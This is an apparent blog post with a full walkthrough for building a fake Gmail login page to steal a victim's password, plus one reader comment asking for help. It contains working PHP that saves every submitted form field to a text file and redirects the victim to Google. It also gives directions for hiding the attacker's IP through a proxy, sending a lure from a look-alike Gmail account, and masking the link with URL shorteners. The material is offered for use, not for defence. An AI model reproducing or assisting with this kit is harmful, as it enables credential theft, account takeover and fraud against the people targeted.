Monday, 4 November 2013

Phishing Page for Gmail

How to create fake or Phishing web page for gmail



 This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.
Steps for Creating Phishing or Fake web Page:Step 1:Go to the gmail.com.  Save the Page as "complet HTML" file


Step 2:Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"


Step3: Upload those image to tinypic or photobucker.com.  copy the url of each image.


Step4:Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .


Step 5:
Search for the
 action="https://www.google.com/accounts/ServiceLoginAuth"
Replace it with
action="http://yoursite urlhere/login.php" save the file.


Step6: Now you need to create login.php
 so you need to open the notepad and type as
<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save it


Step 7:open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.Note:  that web hosting service must has php feature.Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com.  use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 8: create an email with gmail keyword. like : gmailburger@gmail.com


Step 9:  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.

 Note:For user to believe change Your phishing web page url with any of free short url sites. Like : co.nr, co.cc,cz.cc This will make users to believe that it is correct url.


1 comment:

  1. i can't pass the first step for some particular reason , so i would like some help

    ReplyDelete